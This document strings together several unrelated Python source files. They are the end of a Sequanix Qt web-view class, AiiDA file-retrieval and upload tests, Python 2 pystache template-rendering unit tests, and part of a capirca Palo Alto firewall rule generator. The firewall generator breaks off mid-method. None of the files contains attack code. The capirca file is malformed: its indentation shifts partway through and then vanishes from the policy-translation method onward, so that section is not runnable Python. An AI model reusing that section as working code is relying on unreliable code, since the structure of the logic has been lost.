            # BUG FIX: was a bare "except:" (also caught KeyboardInterrupt);
            # only missing attributes on older PyQt builds are expected here.
            # Also fixed the typo "you PyQt" in the message.
            print("QtWebKit.QWebSettings not available for your PyQt version")

    def createWindow(self, type):
        """Handle requests for a new browser window.

        Method called whenever the browser requests a new window
        (e.g., <a target='_blank'> or window.open()).
        Overridden from QWebView to allow for popup windows, if enabled.
        """
        # Keep a reference on self so the popup is not garbage-collected.
        self.popup = SequanixQWebView(**self.kwargs)
        self.popup.setObjectName("web_content")
        self.popup.setWindowTitle("Sequana browser")
        self.popup.page().windowCloseRequested.connect(self.popup.close)
        self.popup.show()
        return self.popup
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for the :mod:`aiida.engine.daemon.execmanager` module."""
import io
import os
import pytest
from aiida.engine.daemon import execmanager
from aiida.transports.plugins.local import LocalTransport
@pytest.mark.usefixtures('clear_database_before_test')
def test_retrieve_files_from_list(tmp_path_factory, generate_calculation_node):
    """Test the `retrieve_files_from_list` function."""
    node = generate_calculation_node()

    # Retrieve one plain file and one nested directory (tuple form is
    # (remote, local, depth) per the retrieve_list convention).
    retrieve_list = [
        'file_a.txt',
        ('sub/folder', 'sub/folder', 0),
    ]

    source = tmp_path_factory.mktemp('source')
    target = tmp_path_factory.mktemp('target')

    content_a = b'content_a'
    content_b = b'content_b'

    # Lay out the source tree: file_a.txt at the root, file_b.txt nested.
    with open(str(source / 'file_a.txt'), 'wb') as handle:
        handle.write(content_a)
        handle.flush()

    os.makedirs(str(source / 'sub' / 'folder'))
    with open(str(source / 'sub' / 'folder' / 'file_b.txt'), 'wb') as handle:
        handle.write(content_b)
        handle.flush()

    with LocalTransport() as transport:
        transport.chdir(str(source))
        execmanager.retrieve_files_from_list(node, transport, str(target), retrieve_list)

    # Both entries should be mirrored into the target, with nesting and
    # contents preserved.
    assert sorted(os.listdir(str(target))) == sorted(['file_a.txt', 'sub'])
    assert os.listdir(str(target / 'sub')) == ['folder']
    assert os.listdir(str(target / 'sub' / 'folder')) == ['file_b.txt']

    with open(str(target / 'sub' / 'folder' / 'file_b.txt'), 'rb') as handle:
        assert handle.read() == content_b

    with open(str(target / 'file_a.txt'), 'rb') as handle:
        assert handle.read() == content_a
@pytest.mark.usefixtures('clear_database_before_test')
def test_upload_local_copy_list(fixture_sandbox, aiida_localhost, aiida_local_code_factory):
    """Test the ``local_copy_list`` functionality in ``upload_calculation``.

    Specifically, verify that files in the ``local_copy_list`` do not end up in the repository of the node.
    """
    from aiida.common.datastructures import CalcInfo, CodeInfo
    from aiida.orm import CalcJobNode, SinglefileData

    inputs = {
        'file_a': SinglefileData(io.BytesIO(b'content_a')).store(),
        'file_b': SinglefileData(io.BytesIO(b'content_b')).store(),
    }

    node = CalcJobNode(computer=aiida_localhost)
    node.store()

    code = aiida_local_code_factory('arithmetic.add', '/bin/bash').store()
    code_info = CodeInfo()
    code_info.code_uuid = code.uuid

    calc_info = CalcInfo()
    calc_info.uuid = node.uuid
    calc_info.codes_info = [code_info]
    # BUG FIX: the second entry previously copied ``file_a`` again, leaving
    # the ``file_b`` input unused and './files/file_b' with the wrong content.
    calc_info.local_copy_list = [
        (inputs['file_a'].uuid, inputs['file_a'].filename, './files/file_a'),
        (inputs['file_b'].uuid, inputs['file_b'].filename, './files/file_b'),
    ]

    with LocalTransport() as transport:
        execmanager.upload_calculation(node, transport, calc_info, fixture_sandbox)

    # The copied files must not have been written to the node's repository.
    assert node.list_object_names() == []
|
<reponame>jakearchibald/pystache
# coding: utf-8
"""
Unit tests of renderengine.py.
"""
import cgi
import unittest
from pystache.context import Context
from pystache.parser import ParsingError
from pystache.renderengine import RenderEngine
from tests.common import assert_strings
class RenderEngineTestCase(unittest.TestCase):

    """Test the RenderEngine class."""

    def test_init(self):
        """
        Test that __init__() stores all of the arguments correctly.

        """
        # In real-life, these arguments would be functions; plain strings
        # are enough to verify that each one lands on the right attribute.
        engine = RenderEngine(load_partial="foo", literal="literal", escape="escape")

        self.assertEquals(engine.escape, "escape")
        self.assertEquals(engine.literal, "literal")
        self.assertEquals(engine.load_partial, "foo")
class RenderTests(unittest.TestCase):

    """
    Tests RenderEngine.render().

    Explicit spec-test-like tests best go in this class since the
    RenderEngine class contains all parsing logic.  This way, the unit tests
    will be more focused and fail "closer to the code".

    """
    # NOTE(review): this module uses Python 2-only constructs
    # (``unicode``, ``except X, err``); it will not run on Python 3 as-is.

    def _engine(self):
        """
        Create and return a default RenderEngine for testing.

        """
        escape = lambda s: unicode(cgi.escape(s))
        engine = RenderEngine(literal=unicode, escape=escape, load_partial=None)
        return engine

    def _assert_render(self, expected, template, *context, **kwargs):
        """
        Test rendering the given template using the given context.

        """
        partials = kwargs.get('partials')
        engine = kwargs.get('engine', self._engine())

        if partials is not None:
            engine.load_partial = lambda key: unicode(partials[key])

        context = Context(*context)

        actual = engine.render(template, context)

        assert_strings(test_case=self, actual=actual, expected=expected)

    def test_render(self):
        self._assert_render('Hi Mom', 'Hi {{person}}', {'person': 'Mom'})

    def test__load_partial(self):
        """
        Test that render() uses the load_template attribute.

        """
        engine = self._engine()
        partials = {'partial': u"{{person}}"}
        engine.load_partial = lambda key: partials[key]

        self._assert_render('Hi Mom', 'Hi {{>partial}}', {'person': 'Mom'}, engine=engine)

    def test__literal(self):
        """
        Test that render() uses the literal attribute.

        """
        engine = self._engine()
        engine.literal = lambda s: s.upper()

        self._assert_render('BAR', '{{{foo}}}', {'foo': 'bar'}, engine=engine)

    def test__escape(self):
        """
        Test that render() uses the escape attribute.

        """
        engine = self._engine()
        engine.escape = lambda s: "**" + s

        self._assert_render('**bar', '{{foo}}', {'foo': 'bar'}, engine=engine)

    def test__escape_does_not_call_literal(self):
        """
        Test that render() does not call literal before or after calling escape.

        """
        engine = self._engine()
        engine.literal = lambda s: s.upper()  # a test version
        engine.escape = lambda s: "**" + s

        template = 'literal: {{{foo}}} escaped: {{foo}}'
        context = {'foo': 'bar'}

        self._assert_render('literal: BAR escaped: **bar', template, context, engine=engine)

    def test__escape_preserves_unicode_subclasses(self):
        """
        Test that render() preserves unicode subclasses when passing to escape.

        This is useful, for example, if one wants to respect whether a
        variable value is markupsafe.Markup when escaping.

        """
        class MyUnicode(unicode):
            pass

        # The test escape function treats the subclass differently from a
        # plain unicode value, so the assertion below proves the subclass
        # survives up to the escape call.
        def escape(s):
            if type(s) is MyUnicode:
                return "**" + s
            else:
                return s + "**"

        engine = self._engine()
        engine.escape = escape

        template = '{{foo1}} {{foo2}}'
        context = {'foo1': MyUnicode('bar'), 'foo2': 'bar'}

        self._assert_render('**bar bar**', template, context, engine=engine)

    def test__non_basestring__literal_and_escaped(self):
        """
        Test a context value that is not a basestring instance.

        """
        # We use include upper() to make sure we are actually using
        # our custom function in the tests
        to_unicode = lambda s: unicode(s, encoding='ascii').upper()
        engine = self._engine()
        engine.escape = to_unicode
        engine.literal = to_unicode

        self.assertRaises(TypeError, engine.literal, 100)

        template = '{{text}} {{int}} {{{int}}}'
        context = {'int': 100, 'text': 'foo'}

        self._assert_render('FOO 100 100', template, context, engine=engine)

    def test_tag__output_not_interpolated(self):
        """
        Context values should not be treated as templates (issue #44).

        """
        template = '{{template}}: {{planet}}'
        context = {'template': '{{planet}}', 'planet': 'Earth'}
        self._assert_render(u'{{planet}}: Earth', template, context)

    def test_tag__output_not_interpolated__section(self):
        """
        Context values should not be treated as templates (issue #44).

        """
        template = '{{test}}'
        context = {'test': '{{#hello}}'}
        self._assert_render('{{#hello}}', template, context)

    def test_interpolation__built_in_type__string(self):
        """
        Check tag interpolation with a string on the top of the context stack.

        """
        item = 'abc'

        # item.upper() == 'ABC'
        template = '{{#section}}{{upper}}{{/section}}'
        context = {'section': item, 'upper': 'XYZ'}
        # The outer 'upper' wins: attributes of the string are not consulted.
        self._assert_render(u'XYZ', template, context)

    def test_interpolation__built_in_type__integer(self):
        """
        Check tag interpolation with an integer on the top of the context stack.

        """
        item = 10

        # item.real == 10
        template = '{{#section}}{{real}}{{/section}}'
        context = {'section': item, 'real': 1000}
        self._assert_render(u'1000', template, context)

    def test_interpolation__built_in_type__list(self):
        """
        Check tag interpolation with a list on the top of the context stack.

        """
        item = [[1, 2, 3]]

        # item[0].pop() == 3
        template = '{{#section}}{{pop}}{{/section}}'
        context = {'section': item, 'pop': 7}
        self._assert_render(u'7', template, context)

    def test_implicit_iterator__literal(self):
        """
        Test an implicit iterator in a literal tag.

        """
        template = """{{#test}}{{{.}}}{{/test}}"""
        context = {'test': ['<', '>']}

        self._assert_render('<>', template, context)

    def test_implicit_iterator__escaped(self):
        """
        Test an implicit iterator in a normal tag.

        """
        template = """{{#test}}{{.}}{{/test}}"""
        context = {'test': ['<', '>']}

        self._assert_render('&lt;&gt;', template, context)

    def test_literal__in_section(self):
        """
        Check that literals work in sections.

        """
        template = '{{#test}}1 {{{less_than}}} 2{{/test}}'
        context = {'test': {'less_than': '<'}}

        self._assert_render('1 < 2', template, context)

    def test_literal__in_partial(self):
        """
        Check that literals work in partials.

        """
        template = '{{>partial}}'
        partials = {'partial': '1 {{{less_than}}} 2'}
        context = {'less_than': '<'}

        self._assert_render('1 < 2', template, context, partials=partials)

    def test_partial(self):
        partials = {'partial': "{{person}}"}
        self._assert_render('Hi Mom', 'Hi {{>partial}}', {'person': 'Mom'}, partials=partials)

    def test_partial__context_values(self):
        """
        Test that escape and literal work on context values in partials.

        """
        engine = self._engine()

        template = '{{>partial}}'
        partials = {'partial': 'unescaped: {{{foo}}} escaped: {{foo}}'}
        context = {'foo': '<'}

        self._assert_render('unescaped: < escaped: &lt;', template, context, engine=engine, partials=partials)

    ## Test cases related specifically to sections.

    def test_section__end_tag_with_no_start_tag(self):
        """
        Check what happens if there is an end tag with no start tag.

        """
        # NOTE(review): if no ParsingError is raised, this test passes
        # silently; a self.fail() after _assert_render would be stricter.
        template = '{{/section}}'
        try:
            self._assert_render(None, template)
        except ParsingError, err:
            self.assertEquals(str(err), "Section end tag mismatch: u'section' != None")

    def test_section__end_tag_mismatch(self):
        """
        Check what happens if the end tag doesn't match.

        """
        # NOTE(review): same silent-pass caveat as the previous test.
        template = '{{#section_start}}{{/section_end}}'
        try:
            self._assert_render(None, template)
        except ParsingError, err:
            self.assertEquals(str(err), "Section end tag mismatch: u'section_end' != u'section_start'")

    def test_section__context_values(self):
        """
        Test that escape and literal work on context values in sections.

        """
        engine = self._engine()

        template = '{{#test}}unescaped: {{{foo}}} escaped: {{foo}}{{/test}}'
        context = {'test': {'foo': '<'}}

        self._assert_render('unescaped: < escaped: &lt;', template, context, engine=engine)

    def test_section__context_precedence(self):
        """
        Check that items higher in the context stack take precedence.

        """
        template = '{{entree}} : {{#vegetarian}}{{entree}}{{/vegetarian}}'
        context = {'entree': 'chicken', 'vegetarian': {'entree': 'beans and rice'}}
        self._assert_render(u'chicken : beans and rice', template, context)

    def test_section__list_referencing_outer_context(self):
        """
        Check that list items can access the parent context.

        For sections whose value is a list, check that items in the list
        have access to the values inherited from the parent context
        when rendering.

        """
        context = {
            "greeting": "Hi",
            "list": [{"name": "Al"}, {"name": "Bob"}],
        }

        template = "{{#list}}{{greeting}} {{name}}, {{/list}}"

        self._assert_render("Hi Al, Hi Bob, ", template, context)

    def test_section__output_not_interpolated(self):
        """
        Check that rendered section output is not interpolated.

        """
        template = '{{#section}}{{template}}{{/section}}: {{planet}}'
        context = {'section': True, 'template': '{{planet}}', 'planet': 'Earth'}
        self._assert_render(u'{{planet}}: Earth', template, context)

    def test_section__nested_truthy(self):
        """
        Check that "nested truthy" sections get rendered.

        Test case for issue #24: https://github.com/defunkt/pystache/issues/24

        This test is copied from the spec.  We explicitly include it to
        prevent regressions for those who don't pull down the spec tests.

        """
        template = '| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |'
        context = {'bool': True}
        self._assert_render(u'| A B C D E |', template, context)

    def test_section__nested_with_same_keys(self):
        """
        Check a doubly-nested section with the same context key.

        Test case for issue #36: https://github.com/defunkt/pystache/issues/36

        """
        # Start with an easier, working case.
        template = '{{#x}}{{#z}}{{y}}{{/z}}{{/x}}'
        context = {'x': {'z': {'y': 1}}}
        self._assert_render(u'1', template, context)

        template = '{{#x}}{{#x}}{{y}}{{/x}}{{/x}}'
        context = {'x': {'x': {'y': 1}}}
        self._assert_render(u'1', template, context)

    def test_section__lambda(self):
        template = '{{#test}}Mom{{/test}}'
        context = {'test': (lambda text: 'Hi %s' % text)}
        self._assert_render('Hi Mom', template, context)

    def test_section__lambda__tag_in_output(self):
        """
        Check that callable output is treated as a template string (issue #46).

        The spec says--

            When used as the data value for a Section tag, the lambda MUST
            be treatable as an arity 1 function, and invoked as such (passing
            a String containing the unprocessed section contents).  The
            returned value MUST be rendered against the current delimiters,
            then interpolated in place of the section.

        """
        template = '{{#test}}Hi {{person}}{{/test}}'
        context = {'person': 'Mom', 'test': (lambda text: text + " :)")}
        self._assert_render('Hi Mom :)', template, context)

    def test_comment__multiline(self):
        """
        Check that multiline comments are permitted.

        """
        self._assert_render('foobar', 'foo{{! baz }}bar')
        self._assert_render('foobar', 'foo{{! \nbaz }}bar')

    def test_custom_delimiters__sections(self):
        """
        Check that custom delimiters can be used to start a section.

        Test case for issue #20: https://github.com/defunkt/pystache/issues/20

        """
        template = '{{=[[ ]]=}}[[#foo]]bar[[/foo]]'
        context = {'foo': True}
        self._assert_render(u'bar', template, context)

    def test_custom_delimiters__not_retroactive(self):
        """
        Check that changing custom delimiters back is not "retroactive."

        Test case for issue #35: https://github.com/defunkt/pystache/issues/35

        """
        expected = u' {{foo}} '
        self._assert_render(expected, '{{=$ $=}} {{foo}} ')
        self._assert_render(expected, '{{=$ $=}} {{foo}} $={{ }}=$')  # was yielding u'  '.
|
<gh_stars>0
# Lint as: python2, python3
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Palo Alto Firewall generator."""
import collections
import datetime
import logging
import re
from xml.dom import minidom
import xml.etree.ElementTree as etree
from capirca.lib import aclgenerator
from capirca.lib import nacaddr
from capirca.lib import policy
class Error(Exception):
    """generic error class."""


class UnsupportedFilterError(Error):
    """Raised for filter types the Palo Alto generator cannot handle."""


class UnsupportedHeaderError(Error):
    """Raised for policy headers the generator cannot handle."""


class PaloAltoFWDuplicateTermError(Error):
    """Raised when two terms share the same name."""


class PaloAltoFWUnsupportedProtocolError(Error):
    """Raised for protocols PAN-OS does not support."""


class PaloAltoFWVerbatimError(Error):
    """Raised for verbatim terms, which are not supported."""


class PaloAltoFWOptionError(Error):
    """Raised for invalid or missing target options (e.g. zones)."""


class PaloAltoFWDuplicateServiceError(Error):
    """Raised when a service object would duplicate an existing one."""


class PaloAltoFWNameTooLongError(Error):
    """Raised when a generated name exceeds the PAN-OS length limit."""


class PaloAltoFWBadIcmpTypeError(Error):
    """Raised for ICMP types the platform does not recognize."""
class Term(aclgenerator.Term):
    """Representation of an individual term.

    This is mostly useful for the __str__() method.

    Attributes:
      obj: a policy.Term object
      term_type: type of filter to generate, e.g. inet or inet6
      filter_options: list of remaining target options (zones)
    """
    ACTIONS = {
        "accept": "allow",
        "deny": "deny",
        "reject": "reset-client",
        "reject-with-tcp-rst": "reset-client",
    }

    def __init__(self, term, term_type, zones):
        self.term = term
        self.term_type = term_type
        self.from_zone = zones[1]
        self.to_zone = zones[3]
        self.extra_actions = []

    def __str__(self):
        """Render config output from this term object."""
        # Verify platform specific terms. Skip whole term if platform does not
        # match.
        # Nothing here for now
        # BUG FIX: the method previously fell off the end and returned None,
        # so str(term) raised "TypeError: __str__ returned non-string".
        # Term rendering happens at the Rule level; return an empty string.
        return ""

    def _Group(self, group):
        """If 1 item return it, else return [ item1 item2 ].

        Args:
          group: a list. could be a list of strings (protocols) or a list of tuples
                 (ports)

        Returns:
          rval: a string surrounded by '[' and '];' if len(group) > 1
                or with just ';' appended if len(group) == 1
        """

        def _FormattedGroup(el):
            """Return the actual formatting of an individual element.

            Args:
              el: either a string (protocol) or a tuple (ports)

            Returns:
              string: either the lower()'ed string or the ports, hyphenated
                      if they're a range, or by itself if it's not.
            """
            if isinstance(el, str):
                return el.lower()
            elif isinstance(el, int):
                return str(el)
            # type is a tuple below here
            elif el[0] == el[1]:
                return "%d" % el[0]
            else:
                return "%d-%d" % (el[0], el[1])

        if len(group) > 1:
            rval = "[ " + " ".join([_FormattedGroup(x) for x in group]) + " ];"
        else:
            rval = _FormattedGroup(group[0]) + ";"
        return rval
class Service(object):
    """Generate PacketFilter policy terms."""

    # Maps (ports_tuple, protocol) -> {"name": <service object name>}.
    # Shared across all instances so duplicates can be detected globally.
    service_map = {}

    def __init__(self, ports, service_name,
                 protocol):  # ports is a tuple of ports
        key = (ports, protocol)
        if key in self.service_map:
            raise PaloAltoFWDuplicateServiceError(
                ("You have a duplicate service. "
                 "A service already exists on port(s): %s") % str(ports))

        final_service_name = "service-" + service_name + "-" + protocol

        # Reject a second service object that would reuse an existing name.
        if any(entry["name"] == final_service_name
               for entry in Service.service_map.values()):
            raise PaloAltoFWDuplicateServiceError(
                "You have a duplicate service. A service named %s already exists." %
                str(final_service_name))

        # PAN-OS limits object names to 63 characters.
        if len(final_service_name) > 63:
            raise PaloAltoFWNameTooLongError(
                "Service name must be 63 characters max: %s" %
                str(final_service_name))

        self.service_map[key] = {"name": final_service_name}
class Rule(object):
  """Extend the Term() class for PaloAlto Firewall Rules."""

  def __init__(self, from_zone, to_zone, terms):
    """Build the option dict for one security rule.

    Args:
      from_zone: source zone name (1-31 characters).
      to_zone: destination zone name (1-31 characters).
      terms: a Term wrapper object; its `.term` attribute holds the
        policy term that is translated in ModifyOptions().

    Raises:
      PaloAltoFWOptionError: either zone name is empty.
      PaloAltoFWNameTooLongError: a zone name exceeds 31 characters.
    """
    # Palo Alto Firewall rule keys
    MAX_ZONE_LENGTH = 31
    if not from_zone or not to_zone:
      raise PaloAltoFWOptionError("Source or destination zone is empty.")
    if len(from_zone) > MAX_ZONE_LENGTH:
      x = "Source zone must be %d characters max: %s" % (MAX_ZONE_LENGTH,
                                                         from_zone)
      raise PaloAltoFWNameTooLongError(x)
    if len(to_zone) > MAX_ZONE_LENGTH:
      x = "Destination zone must be %d characters max: %s" % (MAX_ZONE_LENGTH,
                                                              to_zone)
      raise PaloAltoFWNameTooLongError(x)
    self.options = {}
    # Zones are stored as single-element lists because the XML renderer
    # emits one <member> per list item.
    self.options["from_zone"] = [from_zone]
    self.options["to_zone"] = [to_zone]
    self.ModifyOptions(terms)

  def ModifyOptions(self, terms):
    """Massage firewall rules into Palo Alto rules format."""
    term = terms.term
    self.options["description"] = []
    self.options["source"] = []
    self.options["destination"] = []
    self.options["application"] = []
    self.options["service"] = []
    self.options["logging"] = []
    # COMMENT
    if term.comment:
      self.options["description"] = term.comment
    # LOGGING: "disable" wins outright; "log-both" maps to start+end,
    # any truthy/syslog/local value maps to log-end only.
    if term.logging:
      for item in term.logging:
        if item.value in ["disable"]:
          self.options["logging"] = ["disable"]
          break
        elif item.value in ["log-both"]:
          self.options["logging"].append("log-start")
          self.options["logging"].append("log-end")
        elif item.value in ["True", "true", "syslog", "local"]:
          self.options["logging"].append("log-end")
    # SOURCE-ADDRESS: collapse addresses to their (deduplicated, sorted)
    # parent tokens, which become address-group names in the config.
    if term.source_address:
      saddr_check = set()
      for saddr in term.source_address:
        saddr_check.add(saddr.parent_token)
      saddr_check = sorted(saddr_check)
      for addr in saddr_check:
        self.options["source"].append(str(addr))
    else:
      self.options["source"].append("any")
    # DESTINATION-ADDRESS: same collapsing as for sources.
    if term.destination_address:
      daddr_check = set()
      for daddr in term.destination_address:
        daddr_check.add(daddr.parent_token)
      daddr_check = sorted(daddr_check)
      for addr in daddr_check:
        self.options["destination"].append(str(addr))
    else:
      self.options["destination"].append("any")
    # ACTION
    if term.action:
      self.options["action"] = term.action[0]
    if term.option:
      self.options["option"] = term.option
    if term.pan_application:
      for pan_app in term.pan_application:
        self.options["application"].append(pan_app)
    # Destination ports are rendered to strings ("n" or "low-high") and
    # registered as shared Service objects, one per protocol.
    if term.destination_port:
      ports = []
      for tup in term.destination_port:
        if len(tup) > 1 and tup[0] != tup[1]:
          ports.append(str(tup[0]) + "-" + str(tup[1]))
        else:
          ports.append(str(tup[0]))
      ports = tuple(ports)
      # check to see if this service already exists
      for p in term.protocol:
        if (ports, p) in Service.service_map:
          self.options["service"].append(Service.service_map[(ports,
                                                              p)]["name"])
        else:
          # create service (registers itself in Service.service_map)
          unused_new_service = Service(ports, term.name, p)
          self.options["service"].append(Service.service_map[(ports,
                                                              p)]["name"])
    if term.protocol:
      # Add application "any" to all terms, unless ICMP/ICMPv6
      for proto_name in term.protocol:
        if proto_name in ["icmp", "icmpv6"]:
          continue
        elif proto_name in ["igmp", "sctp", "gre"]:
          if proto_name not in self.options["application"]:
            self.options["application"].append(proto_name)
        elif proto_name in ["tcp", "udp"]:
          if "any" not in self.options["application"]:
            self.options["application"].append("any")
        else:
          pass
class PaloAltoFW(aclgenerator.ACLGenerator):
  """PaloAltoFW rendering class."""

  _PLATFORM = "paloalto"
  SUFFIX = ".xml"
  # Address families accepted in the header's fifth filter option.
  _SUPPORTED_AF = set(("inet", "inet6", "mixed"))
  _AF_MAP = {"inet": (4,), "inet6": (6,), "mixed": (4, 6)}
  _TERM_MAX_LENGTH = 31
  _SUPPORTED_PROTO_NAMES = [
      "tcp",
      "udp",
      "icmp",
      "icmpv6",
      "sctp",
      "igmp",
      "gre",
  ]
  # PAN-OS field-length limits enforced when rendering.
  _MAX_RULE_DESCRIPTION_LENGTH = 1024
  _MAX_TAG_COMMENTS_LENGTH = 1023
  _TAG_NAME_FORMAT = "{from_zone}_{to_zone}_policy-comment-{num}"
  INDENT = "  "

  def __init__(self, pol, exp_info):
    """Initialize rendering state, then translate the policy.

    Args:
      pol: policy.Policy object to render.
      exp_info: weeks before expiration to warn about (passed to the base
        class, which invokes _TranslatePolicy).
    """
    # (header, ruleset, filter_options) tuples, one per rendered filter.
    self.pafw_policies = []
    # zone -> parent_token -> [(address, unique_name), ...]
    self.addressbook = collections.OrderedDict()
    # Names of custom applications (ICMP/ICMPv6 type apps) to emit.
    self.applications = []
    # app name -> attribute dict used by the XML renderer.
    self.application_refs = {}
    self.application_groups = []
    self.pan_applications = []
    self.ports = []
    self.from_zone = ""
    self.to_zone = ""
    self.policy_name = ""
    # Populated with the lxml root element by __str__.
    self.config = None
    super(PaloAltoFW, self).__init__(pol, exp_info)
  def _BuildTokens(self):
    """Build supported tokens for platform.

    Returns:
      tuple containing both supported tokens and sub tokens
    """
    supported_tokens, supported_sub_tokens = super(PaloAltoFW,
                                                   self)._BuildTokens()
    # The base-class token set is replaced wholesale; only the sub-token
    # dict is merged with the platform-specific values below.
    supported_tokens = {
        "action",
        "comment",
        "destination_address",
        "destination_address_exclude",
        "destination_port",
        "expiration",
        "icmp_type",
        "logging",
        "name",
        "option",
        "owner",
        "platform",
        "protocol",
        "source_address",
        "source_address_exclude",
        "source_port",
        "stateless_reply",
        "timeout",
        "pan_application",
        "translated",
    }
    supported_sub_tokens.update({
        "action": {"accept", "deny", "reject", "reject-with-tcp-rst"},
        "option": {"established", "tcp-established"},
    })
    return supported_tokens, supported_sub_tokens
def _TranslatePolicy(self, pol, exp_info):
"""Transform a policy object into a PaloAltoFW object.
Args:
pol: policy.Policy object
exp_info: print a info message when a term is set to expire in that many
weeks
Raises:
UnsupportedFilterError: An unsupported filter was specified
UnsupportedHeaderError: A header option exists that is not
understood/usable
PaloAltoFWDuplicateTermError: Two terms were found with same name in
same filter
PaloAltoFWBadIcmpTypeError: The referenced ICMP type is not supported
by the policy term.
PaloAltoFWUnsupportedProtocolError: The term contains unsupporter protocol
name.
"""
current_date = datetime.date.today()
exp_info_date = current_date + datetime.timedelta(weeks=exp_info)
for header, terms in pol.filters:
if self._PLATFORM not in header.platforms:
continue
# The filter_options is a list of options from header, e.g.
# ['from-zone', 'internal', 'to-zone', 'external']
filter_options = header.FilterOptions(self._PLATFORM)
if (len(filter_options) < 4 or filter_options[0] != "from-zone" or
filter_options[2] != "to-zone"):
raise UnsupportedFilterError(
"Palo Alto Firewall filter arguments must specify from-zone and "
"to-zone.")
self.from_zone = filter_options[1]
self.to_zone = filter_options[3]
# The filter_type values are either inet, inet6, or mixed. Later, the
# code analyzes source and destination IP addresses and determines whether
# it is an appropriate type for the filter_type value.
if len(filter_options) > 4:
filter_type = filter_options[4]
else:
filter_type = "inet"
if filter_type not in self._SUPPORTED_AF:
raise UnsupportedHeaderError(
"Palo Alto Firewall Generator currently does not support"
" %s as a header option" % (filter_type))
term_dup_check = set()
new_terms = []
for term in terms:
if term.stateless_reply:
logging.warning(
"WARNING: Term %s in policy %s>%s is a stateless reply "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "established" in term.option:
logging.warning(
"WARNING: Term %s in policy %s>%s is a established "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "tcp-established" in term.option:
logging.warning(
"WARNING: Term %s in policy %s>%s is a tcp-established "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
term.name = self.FixTermLength(term.name)
if term.name in term_dup_check:
raise PaloAltoFWDuplicateTermError("You have a duplicate term: %s" %
term.name)
term_dup_check.add(term.name)
if term.expiration:
if term.expiration <= exp_info_date:
logging.info(
"INFO: Term %s in policy %s>%s expires "
"in less than two weeks.", term.name, self.from_zone,
self.to_zone)
if term.expiration <= current_date:
logging.warning(
"WARNING: Term %s in policy %s>%s is expired and "
"will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
for i in term.source_address_exclude:
term.source_address = nacaddr.RemoveAddressFromList(
term.source_address, i)
for i in term.destination_address_exclude:
term.destination_address = nacaddr.RemoveAddressFromList(
term.destination_address, i)
# Count the number of occurencies of a particular version of the
# address family, i.e. v4/v6 in source and destination IP addresses.
afc = {
4: {
"src": 0,
"dst": 0
},
6: {
"src": 0,
"dst": 0
},
}
# Determine the address families in the source and destination
# addresses references in the term. Next, determine IPv4 and IPv6
# traffic flow patterns.
exclude_address_family = []
flows = []
src_any = False
dst_any = False
if not term.source_address:
src_any = True
if not term.destination_address:
dst_any = True
for addr in term.source_address:
afc[addr.version]["src"] += 1
for addr in term.destination_address:
afc[addr.version]["dst"] += 1
for v in [4, 6]:
if src_any and dst_any:
flows.append("ip%d-ip%d" % (v, v))
continue
if (afc[v]["src"] == 0 and not src_any) and (afc[v]["dst"] == 0 and
not dst_any):
continue
if (afc[v]["src"] > 0 or src_any) and (afc[v]["dst"] > 0 or dst_any):
flows.append("ip%d-ip%d" % (v, v))
continue
if (afc[v]["src"] > 0 or src_any) and afc[v]["dst"] == 0:
flows.append("ip%d-src-only" % v)
flows.append("ip%d-only" % v)
continue
if afc[v]["src"] == 0 and (afc[v]["dst"] > 0 or dst_any):
flows.append("ip%d-dst-only" % v)
flows.append("ip%d-only" % v)
if filter_type == "inet":
if "icmpv6" in term.protocol:
logging.warning(
"WARNING: Term %s in policy %s>%s references ICMPv6 protocol, "
"term will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "ip4-ip4" not in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has one or more invalid "
"src-dest combinations %s, term will not be rendered.",
term.name, self.from_zone, self.to_zone, flows)
continue
# exclude IPv6 addresses
exclude_address_family.append(6)
elif filter_type == "inet6":
if "icmp" in term.protocol:
logging.warning(
"WARNING: Term %s in policy %s>%s references ICMP protocol, "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "ip6-ip6" not in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has one or more invalid "
"src-dest combinations %s, term will not be rendered.",
term.name, self.from_zone, self.to_zone, flows)
continue
exclude_address_family.append(4)
elif filter_type == "mixed":
if "ip4-ip4" in flows and "ip6-ip6" not in flows:
exclude_address_family.append(6)
pass
elif "ip6-ip6" in flows and "ip4-ip4" not in flows:
exclude_address_family.append(4)
pass
elif "ip4-ip4" in flows and "ip6-ip6" in flows:
pass
elif "ip4-only" in flows and "ip6-only" in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has source and destinations "
"of different address families %s, term will not be "
"rendered.", term.name, self.from_zone, self.to_zone,
filter(lambda p: re.search(p, "(src|dst)-only"), flows))
continue
else:
logging.warning(
"WARNING: Term %s in policy %s>%s has invalid src-dest "
"combinations %s, the term will be rendered without them.",
term.name, self.from_zone, self.to_zone,
filter(lambda p: re.search(p, "(src|dst)-only"), flows))
if "ip4-ip4" in flows:
exclude_address_family.append(6)
else:
exclude_address_family.append(4)
# Build address book for the addresses referenced in the term.
for addr in term.source_address:
if addr.version in exclude_address_family:
continue
self._BuildAddressBook(self.from_zone, addr)
for addr in term.destination_address:
if addr.version in exclude_address_family:
continue
self._BuildAddressBook(self.to_zone, addr)
# Handle ICMP/ICMPv6 terms.
if term.icmp_type and ("icmp" not in term.protocol and
"icmpv6" not in term.protocol):
raise UnsupportedFilterError(
"Palo Alto Firewall filter must have ICMP or ICMPv6 protocol " +
"specified when using icmp_type keyword")
for icmp_version in ["icmp", "icmpv6"]:
